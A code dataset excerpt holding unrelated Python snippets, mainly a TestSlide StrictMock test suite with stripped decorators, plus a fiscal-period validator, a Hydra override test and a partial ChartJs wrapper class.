code stringlengths 281 23.7M |
|---|
# NOTE(review): this is TestSlide DSL test code whose decorators and
# indentation were stripped by extraction. `('StrictMock')` was presumably
# `@context('StrictMock')`, bare `_context` lines were `@context.sub_context`,
# and nested `def`s were `@context.function` / `@context.example` members —
# TODO confirm against the original testslide test suite. Code left
# byte-identical; only comments added.
('StrictMock')
def strict_mock(context):
# Context-manager helper: asserts `exception` is raised with an exact message.
def assertRaisesWithMessage(self, exception, msg):
with self.assertRaises(exception) as cm:
(yield)
ex_msg = str(cm.exception)
self.assertEqual(ex_msg, msg, 'Expected exception {}.{} message to be\n{}\nbut got\n{}.'.format(exception.__module__, exception.__name__, repr(msg), repr(ex_msg)))
# Context-manager helper: asserts `exception` is raised with a message matching `rgx`.
def assertRaisesWithRegexMessage(self, exception, rgx):
with self.assertRaises(exception) as cm:
(yield)
ex_msg = str(cm.exception)
if (not re.search(rgx, ex_msg)):
# Deliberately reuses assertEqual so the failure output shows both strings.
self.assertEqual(ex_msg, rgx, 'Expected exception {}.{} message to match regex\n{}\nbut got\n{}.'.format(exception.__module__, exception.__name__, repr(rgx), repr(ex_msg)))
# Filename of this test module; used to build StrictMock repr regexes.
def caller_filename(self):
current_module = sys.modules[__name__]
filename = (inspect.getsourcefile(current_module) or inspect.getfile(current_module))
return filename
# Shared sub-context: verifies attributes survive being wrapped by StrictMock.
_context
def can_access_attributes(context):
def can_access_attributes(self):
self.mock_function.attribute = 'value'
self.assertEqual(self.mock_function.attribute, 'value')
self.assertEqual(getattr(self.mock_function, 'attribute'), 'value')
setattr(self.strict_mock, self.test_method_name, self.mock_function)
# NOTE(review): 'mocked_metod' typo is in the original; left as-is.
mocked_metod = getattr(self.strict_mock, self.test_method_name)
self.assertEqual(getattr(mocked_metod, 'attribute'), 'value')
setattr(mocked_metod, 'new_attribute', 'new_value')
self.assertEqual(getattr(mocked_metod, 'new_attribute'), 'new_value')
delattr(mocked_metod, 'new_attribute')
self.assertFalse(hasattr(mocked_metod, 'new_attribute'))
_context
def without_template(context):
context.memoize('strict_mock', (lambda self: StrictMock()))
def strict_mock_rgx(self):
return (('<StrictMock 0x{:02X} '.format(id(self.strict_mock)) + re.escape(self.caller_filename)) + ':\\d+>')
context.memoize('value', (lambda self: ))
context.memoize('test_method_name', (lambda self: 'some_method'))
context.memoize('mock_function', (lambda self: (lambda : None)))
context.merge_context('can access attributes')
def raises_when_an_undefined_attribute_is_accessed(self):
name = 'undefined_attribute'
with self.assertRaisesWithRegexMessage(AttributeError, f"'{name}' was not set for {self.strict_mock}."):
getattr(self.strict_mock, name)
def allows_mocking_any_attribute(self):
self.strict_mock.any_attribute = self.value
self.assertEqual(self.strict_mock.any_attribute, self.value)
def allows_deleting_a_mocked_attribute(self):
name = 'attr_name'
setattr(self.strict_mock, name, self.value)
self.assertTrue(hasattr(self.strict_mock, name))
delattr(self.strict_mock, name)
with self.assertRaisesWithRegexMessage(AttributeError, f"'{name}' was not set for {self.strict_mock}."):
getattr(self.strict_mock, name)
def allows_mocking_any_method(self):
def value_plus(b):
return (self.value + b)
self.strict_mock.any_method = value_plus
plus = 2341
self.assertEqual(self.strict_mock.any_method(plus), (self.value + plus))
def allows_mocking_context_manager_methods(self):
enter_mock = 'something'
self.strict_mock.__enter__ = (lambda : enter_mock)
self.strict_mock.__exit__ = (lambda exc_type, exc_value, traceback: None)
with self.strict_mock as target:
self.assertEqual(target, enter_mock)
def attribute_type_is_maintained(self):
callable_attr = CallableObject()
self.strict_mock.callable_attr = callable_attr
attr = {1: 2}
self.strict_mock.attr = attr
self.assertEqual(type(self.strict_mock.callable_attr), type(callable_attr))
self.assertEqual(type(self.strict_mock.attr), type(attr))
# Sub-contexts covering StrictMock used WITH a template class. Decorators and
# indentation were stripped by extraction; code left byte-identical.
_context
def with_a_template(context):
_context
def by_subclassing_StrictMock(context):
def strict_mock(self):
return TemplateStrictMock()
def overriding_regular_methods_work(self):
self.assertEqual(self.strict_mock.instance_method('Hello'), 'mock')
def overriding_magic_methods_work(self):
self.assertEqual(len(self.strict_mock), 100)
def type_validation_works(self):
with self.assertRaises(TypeCheckError):
self.strict_mock.static_method('whatever')
# Hashing must work so the mock can be used as a dict key...
def hash_works(self):
d = {}
d[self.strict_mock] = 'value'
self.assertEqual(d[self.strict_mock], 'value')
# ...but overriding __hash__ itself is not supported.
def cant_set_hash(self):
with self.assertRaises(UnsupportedMagic):
self.strict_mock.__hash__ = (lambda : 0)
_context
def given_as_an_argument(context):
_context
def sync_attributes(context):
context.memoize('default_context_manager', (lambda self: False))
context.memoize('type_validation', (lambda self: True))
def runtime_attr(self):
return 'some_runtime_attr'
# NOTE(review): pairs like set_trim_path_prefix/unpatch were presumably
# @context.before/@context.after hooks sharing scope via self in the
# original; `original_trim_path_prefix` is otherwise local — TODO confirm.
def set_trim_path_prefix(self):
original_trim_path_prefix = StrictMock.TRIM_PATH_PREFIX
StrictMock.TRIM_PATH_PREFIX = ''
def unpatch(self):
StrictMock.TRIM_PATH_PREFIX = original_trim_path_prefix
def template(self):
return Template
def strict_mock(self):
return StrictMock(self.template, runtime_attrs=[self.runtime_attr], default_context_manager=self.default_context_manager, type_validation=self.type_validation)
# Regex matching the repr of a templated StrictMock.
def strict_mock_rgx(self):
return (('<StrictMock 0x{:02X} template={} '.format(id(self.strict_mock), '{}.{}'.format(self.template.__module__, self.template.__name__)) + re.escape(self.caller_filename)) + ':\\d+>')
def mock_function(self):
def mock_function(message):
return 'mock: {}'.format(message)
return mock_function
_context
def non_callable_attributes(context):
# Template attributes that exist but were not given a value raise
# UndefinedAttribute on access.
def raises_when_an_undefined_attribute_is_accessed(self):
attr_name = 'non_callable'
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''{attr_name}' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
getattr(self.strict_mock, attr_name)
def shows_the_correct_file_and_linenum_when_raising_when_an_undefined_attribute_is_accessed(self):
attr_name = 'non_callable'
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''{attr_name}' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
getattr(self.strict_mock, attr_name)
# Attributes absent from the template raise plain AttributeError.
def raises_when_an_non_existing_attribute_is_accessed(self):
attr_name = 'non_existing_attr'
with self.assertRaisesWithRegexMessage(AttributeError, f"'{attr_name}' was not set for {self.strict_mock_rgx}."):
getattr(self.strict_mock, attr_name)
def raises_when_setting_non_existing_attributes(self):
attr_name = 'non_existing_attr'
with self.assertRaisesWithRegexMessage(NonExistentAttribute, f"'{attr_name}' is not part of the API.*"):
setattr(self.strict_mock, attr_name, 'whatever')
def allows_existing_attributes_to_be_set(self):
new_value = 'new value'
self.strict_mock.non_callable = new_value
self.assertEqual(self.strict_mock.non_callable, new_value)
def allows_init_set_attributes_to_be_set(self):
new_value = (lambda msg: f'hello {msg}')
self.strict_mock.runtime_attr_from_init = new_value
self.assertEqual(self.strict_mock.runtime_attr_from_init('world'), 'hello world')
def allows_parent_init_set_attributes_to_be_set(self):
new_value = 'new value'
self.strict_mock.parent_runtime_attr_from_init = new_value
self.assertEqual(self.strict_mock.parent_runtime_attr_from_init, new_value)
# runtime_attrs passed to StrictMock() are settable even though not in the template.
def can_set_runtime_attrs(self):
value = 3412
setattr(self.strict_mock, self.runtime_attr, value)
self.assertEqual(getattr(self.strict_mock, self.runtime_attr), value)
def can_set_slots_attribute(self):
value = 3412
setattr(self.strict_mock, 'slot_attribute', value)
self.assertEqual(getattr(self.strict_mock, 'slot_attribute'), value)
def attribute_type_is_maintained(self):
non_callable = 'non callable'
self.strict_mock.non_callable = non_callable
self.assertEqual(type(self.strict_mock.non_callable), type(non_callable))
_context
def type_validation(context):
def allows_setting_valid_type(self):
self.strict_mock.non_callable = 'valid'
def raises_with_invalid_template(self):
with self.assertRaises(ValueError):
StrictMock(dict())
# Mocks with a matching template/spec pass type validation...
def allows_setting_valid_type_with_templated_mock(self):
self.strict_mock.non_callable = unittest.mock.Mock(spec=str)
self.strict_mock.non_callable = StrictMock(template=str)
def allows_setting_valid_type_with_generic_mock(self):
self.strict_mock.non_callable = unittest.mock.Mock()
self.strict_mock.non_callable = StrictMock()
# ...while raw values and mocks of the wrong type are rejected.
def raises_TypeCheckError_when_setting_invalid_type(self):
with self.assertRaises(TypeCheckError):
self.strict_mock.non_callable = 1
def raises_TypeCheckError_when_setting_with_mock_with_invalid_type_template(self):
with self.assertRaises(TypeCheckError):
self.strict_mock.non_callable = unittest.mock.Mock(spec=int)
with self.assertRaises(TypeCheckError):
self.strict_mock.non_callable = StrictMock(template=int)
_context('with type_validation=False')
def with_type_validation_False(context):
context.memoize('type_validation', (lambda self: False))
def allows_setting_invalid_type(self):
self.strict_mock.non_callable = 1
def allows_setting_with_mock_with_invalid_type_template(self):
self.strict_mock.non_callable = unittest.mock.Mock(spec=int)
self.strict_mock.non_callable = StrictMock(template=int)
# Sub-contexts for callable attributes (instance/static/class/magic methods)
# of a templated StrictMock. Decorators and indentation stripped by
# extraction; code left byte-identical.
_context
def callable_attributes(context):
_context
def callable_attribute_tests(context):
_context
def failures(context):
# Template-declared callables can only be replaced by callables.
def raises_when_setting_a_non_callable_value(self):
with self.assertRaisesWithRegexMessage(NonCallableValue, f''''{self.test_method_name}' can not be set with a non-callable value.
{self.strict_mock_rgx} template class requires this attribute to be callable.'''):
setattr(self.strict_mock, self.test_method_name, 'non callable')
def raises_when_an_undefined_method_is_accessed(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''{self.test_method_name}' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
getattr(self.strict_mock, self.test_method_name)
_context
def signature_and_type_validation(context):
def works_with_wraps(self):
test_method_name = '{}_wrapped'.format(self.test_method_name)
setattr(self.strict_mock, test_method_name, (lambda message: 'mock: {}'.format(message)))
method = getattr(self.strict_mock, test_method_name)
self.assertEqual(method('hello'), 'mock: hello')
# Shared examples, branched at context-build time on the type_validation flag.
_context
def common_examples(context, type_validation):
if type_validation:
def fails_on_invalid_signature_call(self):
setattr(self.strict_mock, self.test_method_name, (lambda message, extra: None))
with self.assertRaises(TypeError):
getattr(self.strict_mock, self.test_method_name)('message', 'extra')
def fails_on_invalid_argument_type_call(self):
setattr(self.strict_mock, self.test_method_name, (lambda message: None))
with self.assertRaises(TypeCheckError):
getattr(self.strict_mock, self.test_method_name)(1234)
def fails_on_invalid_return_type(self):
setattr(self.strict_mock, self.test_method_name, (lambda message: 1234))
with self.assertRaises(TypeCheckError):
getattr(self.strict_mock, self.test_method_name)('message')
else:
def passes_on_invalid_argument_type_call(self):
setattr(self.strict_mock, self.test_method_name, (lambda message: 'mock'))
self.assertEqual(getattr(self.strict_mock, self.test_method_name)(1), 'mock')
def passes_on_invalid_return_type(self):
setattr(self.strict_mock, self.test_method_name, (lambda message: 1234))
self.assertEqual(getattr(self.strict_mock, self.test_method_name)('message'), 1234)
_context('with type_validation=True')
def with_type_validation_True(context):
context.merge_context('common examples', type_validation=True)
_context('with type_validation=False')
def with_type_validation_False(context):
context.memoize('type_validation', (lambda self: False))
context.merge_context('common examples', type_validation=False)
def attribute_type_is_maintained(self):
setattr(self.strict_mock, self.test_method_name, self.mock_function)
self.assertEqual(type(getattr(self.strict_mock, self.test_method_name)), type(self.mock_function))
_context
def success(context):
def isinstance_is_true_for_template(self):
self.assertTrue(isinstance(self.strict_mock, self.template))
self.assertTrue(isinstance(self.strict_mock, self.template.mro()[1]))
_context
def method_mocking(context):
context.merge_context('can access attributes')
# NOTE(review): presumably an @context.after hook in the original DSL.
def after(self):
self.assertEqual(getattr(self.strict_mock, self.test_method_name)('hello'), 'mock: hello')
def can_mock_with_function(self):
setattr(self.strict_mock, self.test_method_name, self.mock_function)
def can_mock_with_lambda(self):
setattr(self.strict_mock, self.test_method_name, (lambda message: 'mock: {}'.format(message)))
def can_mock_with_instancemethod(self):
class SomeClass():
def mock_method(self, message):
return 'mock: {}'.format(message)
setattr(self.strict_mock, self.test_method_name, SomeClass().mock_method)
def works_with_mock_callable(self):
self.mock_callable(self.template, 'class_method').to_return_value(None)
strict_mock2 = StrictMock(self.template)
strict_mock2.instance_method = (lambda *args, **kwargs: None)
# The callable-attribute test battery is run once per method flavor.
_context
def instance_methods(context):
def before(self):
self.test_method_name = 'instance_method'
context.merge_context('callable attribute tests')
_context
def static_methods(context):
def before(self):
self.test_method_name = 'static_method'
context.merge_context('callable attribute tests')
_context
def class_methods(context):
def before(self):
self.test_method_name = 'class_method'
context.merge_context('callable attribute tests')
_context
def magic_methods(context):
def raises_when_an_undefined_magic_method_is_accessed(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''__abs__' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
abs(self.strict_mock)
def can_set_magic_methods(self):
value = 23412
self.strict_mock.__abs__ = (lambda : value)
self.assertEqual(abs(self.strict_mock), value)
# NOTE(review): presumably `@context.example('bool() works')` originally.
('bool() works')
def bool_works(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''__len__' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
bool(self.strict_mock)
self.strict_mock.__len__ = (lambda : 0)
self.assertEqual(bool(self.strict_mock), False)
# Sub-contexts for context-manager behavior, str templates, and async
# attributes of a templated StrictMock. Decorators and indentation were
# stripped by extraction; code left byte-identical.
_context
def context_manager(context):
def template(self):
return ContextManagerTemplate
def context_manager_raises_UndefinedAttribute(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''__enter__' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
with self.strict_mock:
pass
# With default_context_manager=True the mock auto-implements __enter__/__exit__.
_context('with default_context_manager=True')
def with_default_context_manager_True(context):
context.memoize('default_context_manager', (lambda self: True))
def it_yields_the_mock(self):
with self.strict_mock as target:
self.assertTrue((target is self.strict_mock))
def works_with_exitstack(self):
with contextlib.ExitStack() as exit_stack:
target = exit_stack.enter_context(self.strict_mock)
self.assertTrue((target is self.strict_mock))
_context
def string_template(context):
async def undefined_attribute(self) -> None:
with self.assertRaises(UndefinedAttribute):
StrictMock(template=str).join
async def attribute_error(self) -> None:
with self.assertRaises(AttributeError):
StrictMock(template=str).garbage
_context
def async_attributes(context):
# NOTE(review): bare `_before` lines were presumably @context.before hooks
# memoizing these values for the async examples — TODO confirm upstream.
_before
async def default_context_manager(self):
return False
_before
async def type_validation(self):
return True
_before
async def strict_mock(self):
get_strict_mock = (lambda : StrictMock(template=Template, default_context_manager=self.default_context_manager, type_validation=self.type_validation))
return get_strict_mock()
_context
def async_method_tests(context):
async def raises_when_setting_a_non_callable_value(self):
with self.assertRaisesWithRegexMessage(NonCallableValue, f''''{self.method_name}' can not be set with a non-callable value.
<StrictMock .+> template class requires this attribute to be callable.'''):
setattr(self.strict_mock, self.method_name, 'not callable')
_context
def signature_and_type_validation(context):
# Shared async examples branched at build time on type_validation.
_context
def common_examples(context, type_validation):
if type_validation:
async def fails_on_wrong_signature_call(self):
async def mock(msg):
return 'mock '
setattr(self.strict_mock, self.method_name, mock)
with self.assertRaises(TypeError):
(await getattr(self.strict_mock, self.method_name)('hello', 'wrong'))
async def can_mock_with_async_function(self):
async def mock(msg):
return ('mock ' + msg)
setattr(self.strict_mock, self.method_name, mock)
self.assertEqual((await getattr(self.strict_mock, self.method_name)('hello')), 'mock hello')
# An async template method mocked with a sync function must fail.
async def can_not_mock_with_sync_function(self):
def mock(msg):
return ('mock ' + msg)
setattr(self.strict_mock, self.method_name, mock)
with self.assertRaises(NonAwaitableReturn):
((await getattr(self.strict_mock, self.method_name)('hello')),)
async def fails_on_wrong_type_call(self):
async def mock(msg):
return 'mock '
setattr(self.strict_mock, self.method_name, mock)
with self.assertRaises(TypeCheckError):
(await getattr(self.strict_mock, self.method_name)(1))
async def fails_on_invalid_return_type(self):
async def mock(message):
return 1234
setattr(self.strict_mock, self.method_name, mock)
with self.assertRaises(TypeCheckError):
(await getattr(self.strict_mock, self.method_name)('message'))
else:
async def passes_on_wrong_signature_call(self):
async def mock(msg, extra):
return 'mock '
setattr(self.strict_mock, self.method_name, mock)
(await getattr(self.strict_mock, self.method_name)('hello', 'wrong'))
async def can_mock_with_async_function(self):
async def mock(msg):
return ('mock ' + msg)
setattr(self.strict_mock, self.method_name, mock)
self.assertEqual((await getattr(self.strict_mock, self.method_name)('hello')), 'mock hello')
async def can_mock_with_sync_function(self):
def mock(msg):
return ('mock ' + msg)
setattr(self.strict_mock, self.method_name, mock)
self.assertEqual(getattr(self.strict_mock, self.method_name)('hello'), 'mock hello')
async def passes_on_wrong_type_call(self):
async def mock(msg):
return 'mock '
setattr(self.strict_mock, self.method_name, mock)
(await getattr(self.strict_mock, self.method_name)(1))
async def passes_on_invalid_return_type(self):
async def mock(message):
return 1234
setattr(self.strict_mock, self.method_name, mock)
self.assertEqual((await getattr(self.strict_mock, self.method_name)('message')), 1234)
_context('with type_validation=True')
def with_type_validation_True(context):
context.merge_context('common examples', type_validation=True)
_context('with type_validation=False')
def with_type_validation_False(context):
_before
async def type_validation(self):
return False
context.merge_context('common examples', type_validation=False)
async def attribute_type_is_maintained(self):
async def mock(msg):
return ('mock ' + msg)
setattr(self.strict_mock, self.method_name, mock)
self.assertEqual(type(getattr(self.strict_mock, self.method_name)), type(mock))
# The async test battery is run once per method flavor.
_context
def instance_methods(context):
_before
async def method_name(self):
return 'async_instance_method'
context.merge_context('async method tests')
_context
def static_methods(context):
_before
async def method_name(self):
return 'async_static_method'
context.merge_context('async method tests')
_context
def class_methods(context):
_before
async def method_name(self):
return 'async_class_method'
context.merge_context('async method tests')
def async_iterator(context):
async def default_raises_UndefinedAttribute(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, "'__aiter__' is not set.\n<StrictMock .+> must have a value set for this attribute if it is going to be accessed."):
async for _ in self.strict_mock:
pass
async def can_mock_async_iterator(self):
self.strict_mock.__aiter__ = (lambda : self.strict_mock)
expected_values = [3, 4, 5]
mock_values = copy.copy(expected_values)
async def mock():
if mock_values:
return mock_values.pop()
raise StopAsyncIteration
self.strict_mock.__anext__ = mock
yielded_values = []
async for v in self.strict_mock:
yielded_values.append(v)
self.assertEqual(expected_values, list(reversed(yielded_values)))
_context
def async_context_manager(context):
async def default_raises_UndefinedAttribute(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, "'__aenter__' is not set.\n<StrictMock .+> must have a value set for this attribute if it is going to be accessed."):
async with self.strict_mock:
pass
async def can_mock_async_context_manager(self):
async def aenter():
return 'yielded'
async def aexit(exc_type, exc_value, traceback):
pass
self.strict_mock.__aenter__ = aenter
self.strict_mock.__aexit__ = aexit
async with self.strict_mock as m:
assert (m == 'yielded')
_context('default_context_manager=True')
def default_context_manager_True(context):
_before
async def default_context_manager(self):
return True
async def it_yields_the_mock(self):
async with self.strict_mock as m:
assert (id(self.strict_mock) == id(m))
async def works_with_exitstack(self):
async with contextlib.AsyncExitStack() as exit_stack:
target = (await exit_stack.enter_async_context(self.strict_mock))
self.assertTrue((target is self.strict_mock))
_context
def making_copies(context):
context.memoize('strict_mock', (lambda self: StrictMock(template=Template)))
context.memoize('key', (lambda self: 1))
context.memoize('value', (lambda self: 2))
context.memoize('attr', (lambda self: {self.key: self.value}))
def set_attributes(self):
self.strict_mock.attr = self.attr
self.strict_mock.instance_method = (lambda arg: 'mock')
self.strict_mock.__eq__ = (lambda other: True)
('copy.copy()')
def copy_copy(self):
strict_mock_copy = copy.copy(self.strict_mock)
self.assertEqual(id(self.strict_mock.attr), id(strict_mock_copy.attr))
self.assertEqual(id(self.strict_mock.instance_method), id(strict_mock_copy.instance_method))
self.assertEqual(self.strict_mock.instance_method('hello'), strict_mock_copy.instance_method('hello'))
('copy.deepcopy()')
def copy_deepcopy(self):
strict_mock_copy = copy.deepcopy(self.strict_mock)
self.assertEqual(self.strict_mock.attr, strict_mock_copy.attr)
self.assertNotEqual(id(self.strict_mock.attr), id(strict_mock_copy.attr))
self.assertEqual(self.strict_mock.attr, strict_mock_copy.attr)
self.assertEqual(self.strict_mock.instance_method('hello'), strict_mock_copy.instance_method('hello'))
self.assertEqual(self.strict_mock.instance_method('meh'), 'mock')
_context('with TRIM_PATH_PREFIX set')
def with_trim_path_prefix_set(context):
def testslide_root(self):
current_module = sys.modules[__name__]
filename = (inspect.getsourcefile(current_module) or inspect.getfile(current_module))
dirname = os.sep.join(filename.split(os.sep)[:(- 2)])
return (dirname + '/')
def set_trim_path_prefix(self):
original_trim_path_prefix = StrictMock.TRIM_PATH_PREFIX
StrictMock.TRIM_PATH_PREFIX = self.testslide_root
def unpatch(self):
StrictMock.TRIM_PATH_PREFIX = original_trim_path_prefix
def caller_filename(self):
current_module = sys.modules[__name__]
filename = (inspect.getsourcefile(current_module) or inspect.getfile(current_module))
split = filename.split(self.testslide_root)
if ((len(split) == 2) and (not split[0])):
filename = split[1]
return filename
def template(self):
return Template
def strict_mock(self):
return StrictMock(template=self.template)
('__str__ trims prefix')
def it_trims_prefix(self):
self.assertTrue(re.search((('<StrictMock 0x{:02X} template={} '.format(id(self.strict_mock), '{}.{}'.format(self.template.__module__, self.template.__name__)) + re.escape(self.caller_filename)) + ':\\d+>'), str(self.strict_mock)))
_context
def check_return_type_validation(context):
_context
def run_context(context, target):
def default_validation_at_mock_callable_level(self):
self.mock_callable(target, 'instance_method').to_return_value(1)
if (isinstance(target, StrictMock) and (not target._type_validation)):
target.instance_method(arg1='', arg2='')
else:
with self.assertRaises(TypeCheckError):
target.instance_method(arg1='', arg2='')
def enforce_validation_at_mock_callable_level(self):
self.mock_callable(target, 'instance_method', type_validation=True).to_return_value(1)
with self.assertRaises(TypeCheckError):
target.instance_method(arg1='', arg2='')
def ignore_validation_at_mock_callable_level(self):
self.mock_callable(target, 'instance_method', type_validation=False).to_return_value(1)
target.instance_method(arg1='', arg2='')
_context
def using_concrete_instance(context):
context.merge_context('run context', target=sample_module.Target())
_context
def using_strict_mock(context):
context.merge_context('run context', target=StrictMock(sample_module.ParentTarget))
_context
def using_strict_mock_with_disabled_type_validation(context):
context.merge_context('run context', target=StrictMock(sample_module.ParentTarget, type_validation=False)) |
def validate_not_monthly_to_quarterly(source_fiscal_period, destination_fiscal_period):
    """Reject copies that would require fabricating quarterly records from monthly data.

    Raises:
        RuntimeError: when the source period is monthly (not a quarter-final
            period) while the destination period is quarterly.
    """
    # Preserve short-circuit order: the destination is only inspected when
    # the source is not already a quarter-final period.
    if not is_quarter_final_period(source_fiscal_period):
        if is_quarter_final_period(destination_fiscal_period):
            raise RuntimeError('Unfortunately, copying from a monthly period to a quarterly period is not supported. This is because we cannot currently fabricate quarterly records from monthly data.')
# NOTE(review): the two leading parenthesized tuples were presumably
# `@mark.parametrize(...)` decorators stripped by extraction — TODO confirm.
# Each case expects ConfigCompositionException with a "Multiple values for
# hydra/..." message requiring the legacy `override` keyword.
('config_name,overrides,expected', [param('legacy_override_hydra', [], raises(ConfigCompositionException, match=re.escape(dedent(" Multiple values for hydra/help. To override a value use 'override hydra/help: custom1'"))), id='legacy_override_hydra-error'), param('legacy_override_hydra2', [], raises(ConfigCompositionException, match=re.escape(dedent(" Multiple values for hydra/output. To override a value use 'override hydra/output: disabled'"))), id='legacy_override_hydra2-error'), param('legacy_override_hydra_wrong_order', [], raises(ConfigCompositionException, match=re.escape(dedent(" Multiple values for hydra/help. To override a value use 'override hydra/help: custom1'"))), id='legacy_override_hydra_wrong_order')])
('version_base', ['1.2', None])
def test_legacy_override_hydra_version_base_1_2(config_name: str, overrides: List[str], expected: DefaultsTreeNode, version_base: Optional[str], hydra_restore_singletons: Any) -> None:
# Pin the Hydra version-base compatibility mode, then run the shared
# defaults-tree assertion helper with hydra defaults prepended.
version.setbase(version_base)
_test_defaults_tree_impl(config_name=config_name, input_overrides=overrides, expected=expected, prepend_hydra=True) |
class ChartJs(JsCanvas.Canvas):
display_value = 'inline-block'
def __init__(self, component: primitives.HtmlModel, js_code: str=None, set_var: bool=True, is_py_data: bool=True, page: primitives.PageModel=None):
self.htmlCode = (js_code if (js_code is not None) else component.html_code)
(self.varName, self.varData, self.__var_def) = (("document.getElementById('%s')" % self.htmlCode), '', None)
(self.component, self.page) = (component, page)
self._js = []
(self._jquery, self._jquery_ui, self._d3) = (None, None, None)
def val(self):
return JsObjects.JsObjects.get(('{%s: {value: %s, timestamp: Date.now(), offset: new Date().getTimezoneOffset()}}' % (self.htmlCode, self.content.toStr())))
def by_name(self) -> JsNodeDom.JsDomsList:
if (self.component.attr.get('name') is not None):
return JsNodeDom.JsDomsList(None, ("document.getElementsByName('%s')" % self.component.attr.get('name')), page=self.page)
return self
def isInViewPort(self) -> JsObjects.JsObject.JsObject:
flag = JsBoolean.JsBoolean('!(rect.bottom < 0 || rect.top - viewHeight >= 0)', js_code='visibleFlag', set_var=True, is_py_data=False)
flag._js.insert(0, self.component.js.viewHeight.setVar('viewHeight'))
flag._js.insert(0, self.getBoundingClientRect().setVar('rect'))
return JsFncs.JsAnonymous(flag.r).return_('visibleFlag').call()
def onViewPort(self, js_funcs: types.JS_FUNCS_TYPES):
return self.component.js.if_(self.isInViewPort, js_funcs)
def content(self):
return JsHtml.ContentFormatters(self.page, ('%s.value' % self.varName))
def empty(self):
return ('%s.value = ""' % self.varName)
def events(self) -> JsNodeDom.JsDomEvents:
return JsNodeDom.JsDomEvents(self.component)
def jquery(self) -> JsQuery.JQuery:
if (self._jquery is None):
self._jquery = JsQuery.JQuery(component=self.component, selector=JsQuery.decorate_var(('#%s' % self.component.htmlCode)), set_var=False)
return self._jquery
def d3(self) -> JsD3.D3Select:
if (self._d3 is None):
self._d3 = JsD3.D3Select(component=self.component, selector=("d3.select('#%s')" % self.component.htmlCode))
return self._d3
def objects(self) -> JsObjects.JsObjects:
return JsObjects.JsObjects(self.page)
def format(self) -> JsHtml.Formatters:
return JsHtml.Formatters(self.page, self.content.toStr())
def style(self, attrs: dict):
styles = []
for (k, v) in attrs.items():
if ('-' in k):
split_css = k.split('-')
k = ('%s%s' % (split_css[0], ''.join([c.title() for c in split_css[1:]])))
styles.append(('this.style.%s = %s' % (k, json.dumps(v))))
return JsUtils.jsConvertFncs(styles, toStr=True)
def registerFunction(self, func_name: str, js_funcs: types.JS_FUNCS_TYPES, pmts: Optional[dict]=None, profile: types.PROFILE_TYPE=None):
js_data = JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile)
self.page.properties.js.add_function(func_name, js_data, pmts)
return self
def hide(self):
return self.css('display', 'none')
def show(self, inline: Optional[str]=None, duration: Optional[int]=None, display_value: Optional[str]=None):
display_value = (display_value or self.display_value)
if (duration is not None):
return super(JsHtml, self).show(('inline-block' if inline else display_value), duration)
return JsUtils.jsConvertData(self.css('display', ('inline-block' if inline else display_value)), None)
def visible(self, data, inline: Optional[str]=None, display_value: Optional[str]=None):
data = JsUtils.jsConvertData(data, None)
return JsObjects.JsVoid(('if(%s){%s} else{%s}' % (data, self.show(inline, display_value=display_value).r, self.hide().r)))
def select(self):
return JsObjects.JsObjects.get(('%s.select()' % self.varName))
def toggle(self, attr: str='display', js_val1: Optional[str]=None, js_val2: str='none'):
if ((attr == 'display') and (js_val1 is None)):
js_val1 = self.display_value
return JsIf.JsIf((self.css(attr) == js_val2), [self.css(attr, js_val1)]).else_([self.css(attr, js_val2)])
def highlight(self, css_attrs: Optional[dict]=None, time_event: int=1000):
if (css_attrs is None):
(css_attrs, css_attrs_origin) = ({}, {})
for (k, v) in Defaults_html.HTML_HIGHLIGHT.items():
if isinstance(v, dict):
(dyn_attrs, dyn_attrs_orign) = ({}, {})
if ('color' in v):
dyn_attrs['color'] = getattr(self.page.theme, *v['color'])
dyn_attrs_orign['color'] = self.page.theme.greys[0]
css_attrs[k] = (v['attr'] % dyn_attrs)
css_attrs_origin[k] = (self.component.attr[k] if (k in self.component.attr) else (v['attr'] % dyn_attrs_orign))
else:
css_attrs[k] = v
css_attrs_origin[k] = (self.component.attr[k] if (k in self.component.attr) else 'none')
else:
css_attrs_origin = {}
for k in css_attrs.keys():
if (k in self.component.attr):
css_attrs_origin[k] = self.component.attr[k]
else:
css_attrs_origin[k] = 'none'
return ('%s; setTimeout(function(){%s}, %s)\n ' % (self.css(css_attrs).r, self.css(css_attrs_origin).r, time_event))
def loadHtml(self, components: List[primitives.HtmlModel], append: bool=False, profile: types.PROFILE_TYPE=None):
if (not isinstance(components, list)):
components = [components]
js_funcs = []
for (i, h) in enumerate(components):
h.options.managed = False
js_funcs.append(self.page.js.objects.new(str(h), isPyData=True, varName=('obj_%s' % i)))
js_funcs.append(self.innerHTML(self.page.js.objects.get(('obj_%s' % i)), append=append).r)
return JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile)
def options(self, options: Optional[dict]=None):
opt = dict(self.component._jsStyles)
if (options is not None):
opt.update(options)
return opt
def copyToClipboard(self, clipboardCopySelector=None, with_header=True):
return JsObjects.JsVoid(("(function(canvas){var image = new Image(); image.src = canvas.toDataURL('image/png'); return image})(%s)" % self.varName))
def active(self):
if (self.component._chart__type in ['scatter', 'bubble']):
active_points = self.component.activePoints()
return JsObjects.JsObject.JsObject.get(('{x: %s, y: %s, label: %s}' % (active_points.label, JsUtils.jsWrap(('%s.data.datasets[%s].data[activePoints[0].index].y' % (active_points.js_code, active_points.num))), active_points.x)))
return JsObjects.JsObject.JsObject.get(('{x: %s, y: %s, label: %s}' % (self.component.activePoints().label, self.component.activePoints().y, self.component.activePoints().x)))
def createWidget(self, html_code: str, container: str=None, options: types.JS_DATA_TYPES=None):
    """Return a JS expression that creates a new chart widget in the DOM at runtime.

